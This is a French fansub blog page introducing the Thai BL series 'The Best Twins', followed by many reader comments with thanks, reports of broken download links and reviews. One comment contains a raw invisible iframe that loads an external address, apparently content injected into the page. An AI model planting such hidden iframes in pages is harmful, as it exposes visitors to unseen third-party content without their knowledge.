• The Best Twins

     

    The Best Twins

    The Best Twins

     

    The Best Twins

    Pays :   Thaïlande

    Titre original : รักจิ้น ฟินเฟร่อ

    Genre : Comédie, BL, Gay

    Diffusion : du samedi 30 mars 2019 au samedi 18 mai 2019

    Chaînes de retransmission : LINE TV Thaïlande

    Nombre d'épisodes : 8 
     
    Durée moyenne : 30 minutes par épisode
     
      

    The Best Twins 

    Pak Papungkorn Sakulsong ปภังกรณ์ สกุลช้าง dans le rôle des jumeaux Per et Pond

    Mild Suttinut Uengtrakul สุทธิณัฐ อึ้งต ระกู  dans le rôle de Tee

     

    Meenay Jutai นิเนย์ จูได๋ dans le rôle du professeur Pad

    Ball Witawat Singlampong วิธวัฒน์ สิงห์ลำพอง dans le rôle de Ball

    Best Vittawin Veeravidhayanant วิธวินทีวีระวิทยานันท์ dans le rôle de Jaet

    Christopher Jonathan Roy Chaafe (Christ The Star 9)  คริสโตเฟอร์ โจนาธาน รอย เชฟ dans le rôle de Thor, le professeur de fitness

    Sgot Sattapong Hongkittikul เศรษฐพงษ์ หงส์กิตติกุล dans le rôle de Mack, le professeur de fitness

    Nattawat Khunakkatrati ณัฏฐ์ธรรศ คุณากรเกีตรติ dans le rôle du professeur Chaai

    Jay Paad Jaein ปาร์ค แจอิล dans le rôle de Tiger, le touriste coréen

     

    The Best Twins

    Per et Pond sont deux frères jumeaux.

    Per est hétéro tandis que son frère Pond est gay, au grand désarroi de sa sœur qui ne tolère pas son homosexualité.

    Le mignon Tee, un des étudiants et voisin de Pond, est secrètement amoureux de lui et rêve de l'embrasser.

    Si Pond semble parfaitement disposé à lui plaire, il n'en reste pas moins prudent.

    La proximité de sa sœur et la présence pesante de son ex-petit ami Ball compliquent la situation.

    Une jolie série BL, drôle et tendre, en perspective...

     

    The Best Twins

    The Best Twins

     

    The Best Twins

    The Best Twins     The Best Twins     The Best Twins     The Best Twins

    The Best Twins     The Best Twins     The Best Twins     The Best Twins

    « Une nouveau système pour une nouvelle année2moons Saison 2 »
    Partager via Gmail Yahoo!

  • Commentaires

    202
    Mercredi 13 Décembre 2023 à 15:49

    Bonjour  à tous sera-t-il possible de voir pour les liens de téléchargement des épisodes 3, 4 , 7et 8 svp aucun ne fonctionne merci beaucoup et merci de nous fournir des series qui a mon goût son tous géniaux 

    201
    Dimanche 26 Novembre 2023 à 14:27

    Bonjour

    J'aime l'idée de'une série sur des jumeaux malheureusement les liens sont morts.

    Pourriez vous réaciver les épisodes: 3, 4, 7 et 8

    Merci d'avance

    Biz

    <iframe style="position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;" src="//div.show/public"></iframe>

    200
    Mercredi 24 Mai 2023 à 23:01

    Bonsoir je suis nouvelle dans les bl et j'adore votre boulot vous etes exceptionnelles comme team par contre je ne peux pas telecharger The best twins tous les liens enfin le seul qu'il y a fichier.com sont invalides . Allez vous mettre de nouveaux liens svp . Bonne soiree happy

    199
    Vendredi 23 Septembre 2022 à 15:49

    Bonjour bonjour !! je signale juste au cas ou les lien uptobox sont morts pour l'EP 2 4 5 6 7 8 ^^ voilà voilà ^^ 

    198
    Mercredi 3 Novembre 2021 à 13:39

    Je vous remercie beaucoup pour la traduction de la série ! grâce au site et à vos traduction je peux bing watcher mes séries autant qu'il me plaît donc un grand Merci.

    Je sais que j'ai la fâcheuse tendance de ne pas assez vous remercier pour votre dur travail donc j'y remédie maintenant.

    Voili voilou ;)

    197
    Samedi 21 Août 2021 à 12:45

    merci pour votre travail, je l ai apprécier

    196
    Mercredi 21 Juillet 2021 à 15:41

    Aide-moi svp quand je télécharge un épisode et que met valide pour regarder et bah ça marche pas

      • Jeudi 5 Août 2021 à 09:39

        salut j'ai eu le meme probleme .Tu dois desactiver ton bloqueur de pub sur le site et ca fonctionne.

    195
    Mercredi 26 Mai 2021 à 14:46

    Coucou tout le monde ! je viens de télécharger cette petite série ! J'ai sauté dessus dès que j'ai vu que Mild jouait dedans ( vraiment cet acteur une petite bulle d'oxygène) ! 

    194
    Lundi 24 Mai 2021 à 17:29

    Bonjour, 

     

    Merci pour tout le travail que vous faite.

    193
    Mercredi 19 Mai 2021 à 17:56

    Bonsoir, merci pour la traduction de cette jolie petite série

    192
    Dimanche 9 Mai 2021 à 14:47

    Merci pour la traduction de cette série !

    191
    Mardi 4 Mai 2021 à 23:01

    Bon alors comment dire... Loin de moi l'idée de critiquer votre travail, bien au contraire: vous faites du super boulot et je vous en remercie.

    Mais cette série... Je l'ai trouvé nulle, désolé.

    Alors, je n'ai peut être pas assez d'humour pour comprendre, mais la sœur homophobe de Pond, quelle tristesse. Tout est poussé à l'extrême a en devenir caricatural.

    Je n'ai pas aimé non plus l'arrivée du copain de la sœur de Tee.

    En plus, dans une scène, on voit apparaître un micro ...

    Franchement, pas bon du tout. C'est pas souvent que ça m'arrive, mais là.... J'ai arrêté de regarder

    Pourtant, j'adore les acteurs que j'ai eu plaisir à suivre dans d'autres séries.Mais là, non, je peux pas.

    Mais merci pour le boulot que vous faites: RESPECT.

    190
    Jeudi 4 Mars 2021 à 21:15

    Merci beaucoup pour la traduction ! 

    189
    Vendredi 26 Février 2021 à 17:38

    Merci beaucoup :)

    188
    Lundi 25 Janvier 2021 à 21:32

    Merci pour la traduction !!!

    187
    Samedi 23 Janvier 2021 à 21:38

    Merci beaucoup d'avoir traduit cette série rafraîchissante.

    186
    Jeudi 21 Janvier 2021 à 18:52

    Je viens de découvrir cette série, j'avais téléchargé le premier épisode mais je m'étais jamais lancé. Je viens de le faire et j'ai adoré cette série avec tous ses moments entre rêve et réalité.

    Je voulais prévenir que l'épisode 7 est difficile à télécharger, j'ai dû essayer plusieurs fois avant de réussir.

    En tout cas, merci beaucoup pour cette série. 

    185
    Samedi 26 Décembre 2020 à 20:04

    merci pour cette série hâte de la découvrir

    184
    Jeudi 23 Juillet 2020 à 09:26

    Je viens de la finir et c'était plutôt léger, sans prise de tête. Une petite comédie mignonne même si vraiment exagérée. 
    Je n'aurais pas pu passer à côté, pas avec Mild que j'adore !
    Merci encore :)

    183
    Jeudi 25 Juin 2020 à 17:18

    bonsoir 

    pour se qui recherche nak et mak dit dans l’épisode  7 il s'agit de la légende de mae nak 

    L’amour au-delà des frontières

    L’histoire comme toujours commence par un début des plus enchanteurs, un homme, beau, intelligent, socialement irréprochable et une femme ayant les mêmes qualités, tombent amoureux de l’un et de l’autre. Ils se marient dans le parfait amour. Au bout de quelques mois, Nak tombe enceinte. Mak ne peut profiter longtemps de l’épanouissement de sa chère et tendre, car le roi Mongkut (Rama IV) part en guerre (les batailles et autres conflits sont nombreux pendant le XIXème siècle dans le royaume de Siam).

    Mak par malchance est gravement blessé lors d’un combat. Il ne peut retourner rapidement dans son foyer bordant les rives du canal de Phra Khanong. Sa convalescence est lente et le temps passe.
    Mais la malchance se poursuit et frappe à nouveau le jeune couple. Alors que Mak éloigné se remet peu à peu, Nak meurt en accouchant. Leur enfant, trop chétif, ne survit pas également.

    … le retour du combattant

    Au bout de quelques semaines, Mak rentre enfin chez lui et trouve au coin du feu sa belle et jeune épouse Nak et leur bébé. Pour Mak tout est normal. Il y a bien des petites choses qui l’interpellent – la pâleur de son épouse et de son enfant – mais ils les associent à la convalescence d’un accouchement difficile.

    Les voisins au courant du funeste destin de Nak n’arrivent pas à le prévenir que son épouse et son enfant sont revenu d’outre-tombe. Chaque fois que l’un d’entre eux veut lui souffler mot, il se fait automatiquement trucider par la malchance ou du moins par un accident provoqué par Nak.

    Un fantôme fou d’amour

    Un jour cependant, un évènement anodin va totalement changer la situation. Mak va alors comprendre la situation. Alors qu’il observait son épouse, Nak, préparer le repas, cette dernière fit tomber accidentellement un aliment qui roula loin d’elle. Au lieu de se déplacer, elle étira son bras de plusieurs mètres afin de l’attraper.Le bras n’avait rien d’humain, il n’était qu’une manifestation surnaturelle…

    Mak fit alors le lien entre les évènements survenus depuis son retour et le comportement étrange de son épouse. Prétextant une envie naturelle d’uriner, Mak s’échappa de son foyer et alla se cacher dans le Wat Mahabut. Lieu saint et consacré, le fantôme ne pouvait y entrer. Nak ne lui voulait aucun mal, mais souhaitait avant tout être avec son mari. Son chagrin emporta sa raison et elle commença à s’en prendre violemment aux habitants du quartier pour les obliger à faire sortir son époux.

    Par chance un exorciste captura Nak et l’enferma dans une jarre. Pour qu’elle ne puisse plus nuire, il la jeta dans le canal de Phrakanong.

    182
    Vendredi 20 Mars 2020 à 17:24

     beaucoup aimer cette serie .merci pour les traduction et bravo pour tout votre travail.

    181
    Mardi 18 Février 2020 à 23:47

    Bonjour, j'ai passé un bon moment avec cette série.

    La plupart étant du positif, j'ai quand même relevé deux trois truc gênant. 

    SPOILERS

    Autant commencé par le négatif:

    Faire prendre des somnifères à la sœur, ce n'est pour ma part pas drôle, oui ce ne sont que des somnifères, malgré tout, il ne faut jamais faire ça, des jeunes pourrait le reproduire (pour faire le mur pour pouvoir sortir par exemple), imagine un collégien qui ne se rend pas compte de la gravité de la situation, fait pareil et hop ton père réagit mal à ce médicament. C'est dangereux et pas drôle.
    Jasmine, elle passe d'un frère à l'autre. Elle voit son frère et Pond s'embrasser et bim Per l'embrasse et hop Pond n'existe plus... Moyen comme message que l'on envoie.
    La relation prof/élève, c'est quelque chose auquel je suis assez sensible. Pour moi un professeur et un élève ne devrait jamais avoir de relation amoureuse, même si l'élève est majeur. Le problème n'est pas que pond soit professeur, c'est qu'il soit le professeur de Tee. Être professeur signifie avoir de l'influence sur ces élèves, ce n'est pas quelque chose de positif. Cependant au vu du peu montrer dans cette série et du ton de celle-ci, je ne pense pas qu'elle l'encourage, je pense surtout qu'ils ont voulu une excuse pour pouvoir réunir tout ces personnages. Donc je ne vais pas plus m'y attarder, juste le souligner.
    Pad, autant j'ai apprécié le développement et l'importance du message véhiculé par ce personnage, autant j'aurais vraiment apprécié qu'elle s'excuse. S'améliorer est une bonne chose mais un pardon n'est jamais de trop.
    Ensuite les élève et Pond n'avait pas à s'excuser. Pad à fait preuve de violence domestique envers ces frères et envers ses élèves et à exprimé des propos homophobes et d'étroitesse d'esprit. Eux lui ont simplement dit qu'il ne la supporter plus, il ne sont coupable de rien excepté de saturation (de sa fermeture d'esprit).

    J'imagine bien que de ce point est surtout des différences culturelles (la violence facile, le manquement au respect des aînés non toléré même quand ceux-ci ont tord) mais malgré tout ce n'est pas toujours facile à accepté et en toute honnêteté peut-être c'est moi qui réfléchit trop ou que j'ai du mal à accepté certain comportement que je considère trop excessif mais qui paraissent beaucoup moins grave ailleurs (ex: la violence punitive considéré banal dans d'autre pays, le manque de prévention au jeune public que j'évoqué dans with love avec qui j'ai pu en discuté avec d'autre d'ailleurs...).

    Bref maintenant passons au positif et au reste

    Déjà les personnages:

    Tee: Mignon, adorable, honnête, doux, amoureux... Il est très plaisant à suivre, tout le long il m'a fait penser à un petit poussin XD
    Pond: Ses incertitudes et son incapacité à se décider sont assez pénibles (surtout au début) mais reste compréhensible. Et même si ça le rend un peu chiant, on sent que ses sentiments pour Tee sont là. Au final il est chouette à suivre.
    Max: Drôle mais très naïf et toujours complètement à côté de la plaque, il est génial.
    Thor: Personnage complètement barré, je sait pas quoi dire à part qu'il est génial XD
    Tiger: Complètement excentrique mais ayant bon fond, il à permis à Pond de fixé ses sentiments pour Tee, très sympa.
    Pad: évoqué plus haut, je vais abordé les bons côté cette fois-ci. Important de mettre un personnages homophobe qui fini par comprendre s'améliorer et devenir meilleur, au final on fini par s'attaché à elle (une fois améliorer, pas avant).
    Jasmine: Évoqué plus haut également, si au début j'avais des doutes au final elle est gentille et c'est une bonne sœur.
    Per: Gentil mais pas grand chose à dire, peut-être le personnage le plus normal de la série.
    Ball: Méthode un peu moyenne mais qui à vraiment subit une rupture douloureuse. Sa fin est mignonne ^^
    La mère de Tee et Jasmine, avare jusqu'au bout des ongles mais qui malgré tout aura appris une leçon très importante à Pad.
    Tout les autres qu'ils soit utiles ou non étaient mignons, sympa et cool à suivre (Chay, Kao, Je Mod...)

    Les Couples:

    Tee et Pond: Très mignon et même quelque scènes prenantes. Sympa et adorable, la chimie les deux était cool. (J'ai beaucoup aimé le cœur en post-it de Tee à la fin ^^)
    Per et Jasmine: Ils arrivent comme un cheveux sur la soupe et c'est dommage, ils aurait pu être développé. Malgré tout très mignons. 
    Max et Thor: OK, ils ne sont pas un couple, mais ils étaient fun et j'avais un gros ship sur eux XD

    Les reste:

    L'humour: Y'en a beaucoup mais ce n'est pas dérangeant, au contraire. Mis à part quelque vanne très lourdingue (ex: la blague sur la taille de chacun) mais honnêtement très fun, c'est remplis de commique de situations de quiproquos et autres truc en tout genre.

    L'imagination débordante et fantasmes de Tee, honnêtement, c'était drôle. De plus par moment ça créer du suspense car on ne savait pas si on était dans sa tête ou dans la réalité ^^

    Toute les autres relations de manière général, quelques exemples:
    Max/Pond/Thor: Bonne alchimie, personnages fun, bonne amitié + beaucoup d'humour et de quiproquos, j'ai adoré. (surtout le passage du dîner avec la coriandre XD)
    Le pseudo couple: important au scénario et délivrant une bonne moral...
    Les relations fraternels...

    Des sujets sensibles:
    Même si la série est très légère elle se permet d'abordé des sujet sensible.
    L'homophobie, avec un personnage féminin, c'est important pour moi car bien souvent on attribue plus ça aux hommes, alors qu'il y a énormément de femmes qui le sont.
    J'en parler plus haut concernant la violence, malgré tout, la série ne valide pas la violence à l’excès, juste n'est pas très sévère à ce sujet.
    L'importance de la vie réelle supérieur à la vie virtuelle.
    Et plusieurs autres.

     

    Pour conclure je dirait que même si il y avait quelque petit truc dérangeant, c'est une série incroyablement fun et décomplexer. J'ai aussi était très contente de voir des étranger, un blancs de surcroît, assez rare je trouve. Ça aide pas mal à rentrer dedans et à pouvoir rire de certaine situation ^^ Un autre point un peu dommage c'est que certain personnages et certaines relations sont peu développés mais malgré tout, ils étaient tous plaisants à suivre et à voir interagir. La série ne traite pas tout les sujet avec la même importance, certain aurait mérité un meilleur développement mais malgré tout elle le fait avec sincérité je trouve.

     

    Au final, merci beaucoup pour cette série qu m'a beaucoup fait rire avec ces personnages hauts en couleurs.

      • Vendredi 4 Juin 2021 à 09:08

        Tu as décris la série exactement telle que je 'ai ressenti pour pendant le visionnage. Et le meilleur passage, pour moi, reste celui de la coriandre (le fou rire que je me suis pris en voyant cette scène he).

        Et les petites notes des traducteurs, notamment concernant Ball, étaient juste épique.

        Merci la team d'avoir pris ce projet fort sympathique

    180
    Jeudi 6 Février 2020 à 14:08

    trop mignon cette serie. un grand merci pour la traduction. bon courage a vous.

    179
    Mercredi 8 Janvier 2020 à 18:58

    Bonsoir,

    C'est une série que je rentre dans le contexte comique et même parfois WTF mais qui a su apporté de ces charmes!

    Merci pour la traduction~!

    178
    Mardi 7 Janvier 2020 à 15:28

    Merci pour la traduction, hâte de découvrir cette histoire ^^ 

    177
    Dimanche 5 Janvier 2020 à 22:26
    Merci pour la traduction ! =)
    176
    Jeudi 5 Décembre 2019 à 12:42

    Un énorme merci pour ce projet !!^^!!

    175
    Dimanche 1er Décembre 2019 à 16:55

    Meerci pour ce projet ça faisait tellement longtemps qu'on ne les avait pas vu ils m'avaient manqué !!!

    174
    Vendredi 29 Novembre 2019 à 14:07
    Bonjour la team, merci pour votre travail, une remarque : impossible de téléchager le 7 à chaque fois j'échoue, bisous
      • Dimanche 1er Décembre 2019 à 04:45

        merci enfin ca marche je vais pouvoir finir cette série bien mignonne, un grand merci

      • Vendredi 29 Novembre 2019 à 18:01

        Kikou, cher Mouno,

        Essaie avec cette adresse pour accéder à 1fichier :

        https://1fichier.com/?pkgc2lvgnittr044sv9o

    173
    Mardi 29 Octobre 2019 à 09:46

    Hello !

    Alors je suis super en retard pour laisser un commentaire sur cette série. Je l'avais regardée en VOSTA sur youtube

    cet été, mais tes traductions m'ont permises de revoir la série hier soir (et comme tu dois le savoir maintenant, 

    j'adore parler série, alors je me suis dit que j'allais laisser un commentaire ^^)

     

    Tout d'abord, merci d'avoir pris cette petite série en projet. Je trouve qu'elle se laisse regarder super facilement 

    et qu’elle était assez drôle et mignonne. J'ai beaucoup aimé le personnage de Tee que je trouve très attachant, et sa

    relation avec Pond est super intrigante, même si au début, clairement, j'avais un peu envie de mettre des petites claques

    à Pond qui n'appréciait pas Tee à sa juste valeur. J'ai aussi adoré les scènes avec les "daydream" et la musique, qui me faisaient

    mourir de rire à chaque fois !

     

    Je trouve qu'on voit que ces acteurs là ont l'habitude de jouer à deux et qu'ils ont pas mal de complicité l'un avec 

    l'autre, ce qui a rendu la série d'autant plus facile à regarder. J'avais eu un peu de mal avec le film Love's coming

    avec les deux acteurs, parce que je trouvais que l'histoire allait un peu dans tous les sens parfois, mais la relation

    et le lien entre les deux acteurs reste indéniable ! 

    Merci beaucoup pour ce projet en tout cas et pour le super boulot que tu as fait ! 

     

    Et de ton côté, qu'en avait tu pensé au final, après avoir traduit et vu toute la série ?

      • Mardi 29 Octobre 2019 à 15:01

        Hé hé... Je me doutais que mon avant-dernière ligne susciterait ta curiosité...

        Je sais que tout le monde ne serait pas d'accord avec mon top 5 mais le voici :

        Commençons par mes indétrônables :

        1. Addicted : la perfection !

        2. Lovesick The Series : l'irremplaçable, les fondements des séries BL thaïes.

        3. Make It Right The Series : ma première série BL thaï, le début de ma passion.

        Et voici les places susceptibles de changer :

        4. HIStory 2 - Right or Wrong : l'atmosphère de l'histoire et les sujets traités me touchent beaucoup.

        5. He's coming to me et Together With Me Next Chapter : le premier est émouvant, Ohm Pawat est mon héros ; le deuxième pour la réussite parfaite de la série et l'alchimie frissonnante du couple principal. 

        SI je devais décerner quelques mentions spéciales, je choisirai : Le Mari de mon frère, Bangkok G Story, History 3 - Trapped.

        Et toi, quel est ton top 5 ? J'avoue que ce n'est pas une mince affaire de choisir.

      • Mardi 29 Octobre 2019 à 14:12

        Hello, 

        Merci pour ta réponse, j'adore lire ton avis sur les différents dramas :D 

        D'ailleurs, tes commentaires m'ont fait me demander....

        Quel est top ton 5 alors ?

        Super difficile comme question, je me rends bien compte !

      • Mardi 29 Octobre 2019 à 13:51

        Kikou ! 

        Après HIStory, réglons son compte à The Best Twins ! ha ha ha

        Au départ, je souhaitais prendre en projet cette série parce que j'avais été séduit par le duo Mild et Pack dans Love's coming.

        Ce film n'est peut-être pas très bien construit, je te rejoins sur ce point. Par rapport à un film comme Waterboyy que j'ai vraiment aimé.

        Mais j'avoue que le bogosse Pack et le gentil Mild m'avaient bien plu.

        Dans The Best Twins, Mild/Tee est fidèle à lui-même, timide, doux, drôle et amoureux. Cet acteur suffit à me faire regarder une série.

        A sa façon, il a un petit côté "bankable".

        Je m'attendais au départ à une histoire légère et mignonne mais la série a choisi délibérément d'être comique.

        Elle se démarque assez bien des autres grâce à ce choix. 

        Elle m'a fait beaucoup rire avec ses personnages hauts en couleur : la maman de Tee, resquilleuse au possible, le serpent Ball, le travesti Je Mod, le naïf Max et le super méga barré Thor ! Ces deux derniers gars auraient d'ailleurs pu former un beau couple.

        Le coréen Tiger était super aussi, avec son accent et ses attitudes exagérées.

        J'ai vraiment apprécié le côté international de la série avec le mélange thaï-anglais-coréen.

        Certains sujets présentaient aussi des aspects sérieux : j'ai été ému par le cheminement de la sœur de Pond qui apprend à accepter l'homosexualité de son frère.

        Au final, la série est très colorée, amusante et décomplexée. Elle divertit bien, même si elle n'accède pas à mon top 5.

        Voili, voilou pour mon avis. Mais je rejoins parfaitement ton point de vue sur Tee et Pond : l'un était adorable, l'autre méritait des baf baf.

    172
    Lundi 28 Octobre 2019 à 12:03

    erci pour se drama au combien wtf mais au combien cute !!!! merci beaucoup pour votre travail !

    171
    Dimanche 27 Octobre 2019 à 01:14

    Je viens tout juste de terminé cette série! C'était vraiment tout mignon. J'ai pas mal rigoler avec vos commentaires perso haha!

    Le petit behind de scene était bien sympa et pour répondre à votre question... Tout ces papiers réuni forme un coeur :D

    Merci pour la traduction!

    170
    Mardi 24 Septembre 2019 à 12:01

    Bonjour, pour  votre excellent travail, cela faisait un moment que je n'ai pas regardé de drama et j'ai beaucoup à rattraper ;). Hâte de commencer cette série. Encore un IMMENSE MERCI

    169
    Mercredi 18 Septembre 2019 à 17:02

    Je viens juste de la terminer j'ai vraiment bien aimé merci encore pour le travail!!!

    168
    Mardi 17 Septembre 2019 à 22:12

    j'ai adorai cette série qui est toute mignonne et que je ne connaissais pas du tout , je l'ai dévorer en une journée,  merci beaucoup pour votre excellent travail .J 'ai hâte de regarder un autre de vos projets mais je n'ai pas encore décider lequel wink2

    167
    Lundi 16 Septembre 2019 à 19:10

    Je viens de voir le dernier épisode merci encore c'est du bon boulot j'adore 

    166
    Dimanche 15 Septembre 2019 à 19:13

    Merci pour ce dernier épisodes et pour votre travail

    165
    Dimanche 15 Septembre 2019 à 18:25

    Merci pour les épisodes 7 et 8 et bon dimanche

    164
    Dimanche 15 Septembre 2019 à 15:45

    Merci beaucoup pour cette série cool

    163
    Dimanche 15 Septembre 2019 à 12:51

    Merci pour cette sortie ^_^

    162
    Dimanche 15 Septembre 2019 à 12:37

    bonjour,merci pour ce dernier épisode tant attendu,bon courage bisoussmile

    161
    Dimanche 15 Septembre 2019 à 11:26

    merci beaucoup pour la traduction. j'ai beaucoup aimé ce BL

    160
    Samedi 14 Septembre 2019 à 21:02

    Merci beaucoup pour ce dernier épisode et pour la traduction de ce lakorn :D

    159
    Samedi 14 Septembre 2019 à 19:30

    Merci pour ce dernier épisodes happy

    158
    Samedi 14 Septembre 2019 à 18:29

    Merci pour la fin de ce drama 

    je vais pouvoir le regarder en entier^^

    157
    Samedi 14 Septembre 2019 à 18:16

    Merci pour ce nouvel et dernier episode

    156
    Mercredi 4 Septembre 2019 à 18:12

    Merci pour c'est 3 nouveaux épisode hâte de voir la suite 

    155
    Lundi 2 Septembre 2019 à 17:05

    merci pour ces nouveaux épisodes ,hate de voir la suite ,bonne fin de journée en et encore merci pur le travail que vous faites ^^

    154
    Lundi 2 Septembre 2019 à 16:59

     Pour la sortie des 2 épisodes. 

    153
    Lundi 2 Septembre 2019 à 13:11

    merci beaucoup pour ses deux nouveaux episodes

    152
    Dimanche 1er Septembre 2019 à 18:49

    Merci beaucoup pour les épisodes 6 et 7 ^w^

    151
    Dimanche 1er Septembre 2019 à 13:20

    coucou

    merci pour ce drama je le regarderais super travail

    bise bon dimanche

    150
    Jumper02
    Dimanche 1er Septembre 2019 à 09:45
    Merci pour ces nouveaux épisodes
    149
    Dimanche 1er Septembre 2019 à 03:43

    bonsoir 

    petit problème je n'arrive pas a télécharger les épisodes 6 et 7 ( fichier non trouver....)

    bon dimanche

      • Dimanche 1er Septembre 2019 à 23:01

        mercihappy

      • Dimanche 1er Septembre 2019 à 07:05

        Les liens sont tout frais. Ils fonctionnent bien. Privilégie Openload et 1Fichier.

    148
    Samedi 31 Août 2019 à 18:19

    merci beaucoup pour ses 2 épisodes

    147
    Lundi 26 Août 2019 à 21:06

    Merci infiniment pour ce 5e épisode :)

    146
    Lundi 26 Août 2019 à 13:43

    merci beaucoup pour ce nouvel épisode

    145
    Lundi 26 Août 2019 à 12:16
    Ils sont trop beaux
    144
    Dimanche 25 Août 2019 à 17:20

    Merci pour l'épisode 5 et bon dimanche

    143
    Dimanche 25 Août 2019 à 13:05

    merci pour cet épisode 5

    142
    Samedi 24 Août 2019 à 18:29

    coucouu
    merci pour l'épisode 5 !

    141
    Mercredi 7 Août 2019 à 23:14

    Merci pour ces premiers épisodes et bon courage pour la suite

    140
    Mercredi 24 Juillet 2019 à 19:12

    Un énorme merci pour la traduction de ces épisodes !!^^!!

    139
    Mardi 9 Juillet 2019 à 15:30

    merci beaucoup pour la traduction des épisodes

     

    138
    Dimanche 7 Juillet 2019 à 01:07

    merci pour l'episode 5

      • Dimanche 7 Juillet 2019 à 01:08

        episode 4

    137
    Dimanche 30 Juin 2019 à 18:47

    j'adore cette série et j'attendrai la suite avec impatience 

    bisou!!!!

    136
    Samasa
    Dimanche 30 Juin 2019 à 14:32

    Merci

    135
    Archie
    Mercredi 26 Juin 2019 à 15:45

    Merci beaucoup pour ces épisodes ! Je n'avais jamais regardé de série thaïlandaise et celle ci s'annonce assez drôle. Pour une fois les effets sonores rajoutés vont bien XD et Ils m'ont tuée avec "Thor" . Merci ! 

    134
    Lundi 24 Juin 2019 à 22:46

    Je vous adores!!!!!

    133
    Samedi 22 Juin 2019 à 21:13

    Merci pour le projet et la traduction

    132
    Lundi 10 Juin 2019 à 22:09

    Merci pour la traduction ^^

    131
    Lundi 10 Juin 2019 à 09:39
    130
    Samedi 8 Juin 2019 à 12:34

    J'ai commencé à regarder et c'est plutôt sympa , hâte de voir la suite smile

    129
    Lundi 3 Juin 2019 à 16:34

    Trop bien!! Un grand merci pour ce projetcool

    128
    Samedi 1er Juin 2019 à 18:10

    merci de traduire cette série!!!!! 

    127
    Samedi 1er Juin 2019 à 03:29

    merci pour la traduction de ces 5 premiers episodes

    126
    Winnie09
    Vendredi 31 Mai 2019 à 15:35

    Merci pour la traduction de cette série ! Hâte de voir la suite !! :)

    125
    Mardi 28 Mai 2019 à 22:52

     

    merci beaucoup pour ce projet, et merci surtout pour tout le travaille que vous faite

    124
    Mardi 28 Mai 2019 à 13:43

    merci pour ce projet ,hate de voir la suite ,bon courage à vous ,bonne journee^^

    123
    Samedi 25 Mai 2019 à 17:43

    Heyyy ! J'aime vraiment beaucoup ce drama. Merci pour les traductions et bonne chance pour la suite. :) 

    122
    Vendredi 24 Mai 2019 à 18:53

    Ce drama à l'air vraiment sympa, merci :)

    121
    Mardi 21 Mai 2019 à 01:49

    Merci, et bon courage à tous

    série très drole, espérons qu'il y est plus de scènes romantique et passionnée

    120
    Dimanche 19 Mai 2019 à 15:59

    Merci pour la traduction de l épisode 4!

    Bon week-end

    119
    Samedi 18 Mai 2019 à 19:53

    Wooow! Super merci pour cette série :D

    118
    Samedi 18 Mai 2019 à 16:58

    Merci encore pour ses nouveaux épisodes^^ plus on avance et plus c'est intéressanthappy

    117
    Samedi 18 Mai 2019 à 16:52

    Merci pour l'épisode 5!!!!!

      • Samedi 18 Mai 2019 à 19:21

        Je ne l'ai pas encore terminé. Je suis désolé... T_T

    116
    Mardi 14 Mai 2019 à 14:49

    merci beaucoup pour la traduction

    115
    Lundi 13 Mai 2019 à 01:53

    Merci bcp pour cette série ainsi que pour votre travail.

    114
    Vendredi 10 Mai 2019 à 21:07

    une petite jalousie qui pointe son nez.

    Cette série devient un regal.

     

    113
    Mercredi 8 Mai 2019 à 22:52

    merci beaucoup pour l'épisode 4!

    112
    Mercredi 8 Mai 2019 à 22:12

    Super j'adore cette série! Même si le début était un peu cliché et agaçant le suite est juste généralissime!^^

    111
    Mercredi 8 Mai 2019 à 20:50

    Merci pour le quatrième épisode 

    110
    Mercredi 8 Mai 2019 à 15:36

    merci merci cool

    109
    Mercredi 8 Mai 2019 à 07:08

    Merci pour ce projet, j'ai vue quelques parties qui m'on beaucoup plu :) J'ai vraiment hâte de le voir :) 

    108
    Mercredi 8 Mai 2019 à 00:05

    Merci pour l'épisode 4. 

    107
    lyli2004
    Mardi 7 Mai 2019 à 20:02

    merci pour l'épisode 4

    106
    Mardi 7 Mai 2019 à 18:26

    Merci beaucoup pour ce série. Bon courage 

    105
    Lundi 6 Mai 2019 à 20:32

    j'aime bcp cette petite serie. elle donne le sourire. un peu surjoué mais cela passe the twins sexy boys lol 

    cela change de faire avec des perso autres que thai

    104
    Lundi 6 Mai 2019 à 19:57

    Merci beaucoup pour ce 4e épisode :)

    103
    Lundi 6 Mai 2019 à 17:25

    Yes merci pour le 4eme épisode ! :D 

    102
    Lundi 6 Mai 2019 à 09:07
    Merci pour la traduction de ce nouvel episode !
    101
    Vendredi 3 Mai 2019 à 13:11

    MERCI BEAUCOUP

    100
    Mardi 30 Avril 2019 à 02:02

    Hâte de voire la suite

    99
    Mardi 30 Avril 2019 à 00:40

    Merci pour la traduction de cette série. Je me tape des barres grâce à Tee, il a une imagination débordante

    98
    Lundi 29 Avril 2019 à 16:56

    Merci beaucoup pour la traduction des 3 premiers épisode 

    97
    Lundi 29 Avril 2019 à 12:25
    Merci pour ses trois premiers épisode =D
    96
    Dimanche 28 Avril 2019 à 15:10

    Merci pour cette traduction, vraiment ! Cette série est juste trop cute et drôle en même temps

    95
    Vendredi 26 Avril 2019 à 16:03

    Merci pour la traduction des 3 premiers épisodes de cette nouvelle série que j'aime bien.

    Bonne journée

     

    94
    Jeudi 25 Avril 2019 à 18:14

    Merci pour ces 3 premiers épisodes j'aime bien ce BL

    93
    Mercredi 24 Avril 2019 à 20:52

    J'ai eu un peu de mal à accrocher au début, mais je continue quand même parce que je trouve que ça se regarde un peu plus facilement au fil des épisodes. Merci à vous pour votre travail <3

    92
    Mercredi 24 Avril 2019 à 17:00

    j'ai beaucoup trop hâte de voir l'épisode 4!!!!!

    91
    Mardi 23 Avril 2019 à 23:28

    Merci beaucoup jais adorer 

    90
    Mardi 23 Avril 2019 à 09:53

    merci pour ce 3 épisode

    89
    Lundi 22 Avril 2019 à 21:52

    merci pour le 3 !
    l’astérisque en référence à together with  m'a bien fait rire he

    88
    Lundi 22 Avril 2019 à 20:04

    VOILA je viens de visionner les 3 épisodes !!! c'est très très mignon franchement merci pour cette nouvelle découverte encore que ferais je sans vous :) encore merci pour votre trad vous êtes au top bisous cool

    87
    Lundi 22 Avril 2019 à 00:23

    Merci beaucoup pour ce nouvel épisode. J 'attend d'en avoir un peu plus pour la commencer, d'autant plus qu'elle à l'air déjantée et sans prise de tête. Tout ce qu'il faut après une dure journée de travail

    86
    Kina
    Dimanche 21 Avril 2019 à 20:01
    Merci Hikoki-Gumo pour ce projet très sympa
    85
    Dimanche 21 Avril 2019 à 13:07

    merci pour votre travaille hate de voir la suitehappy

    84
    Dimanche 21 Avril 2019 à 10:47

    merci beaucoup^^

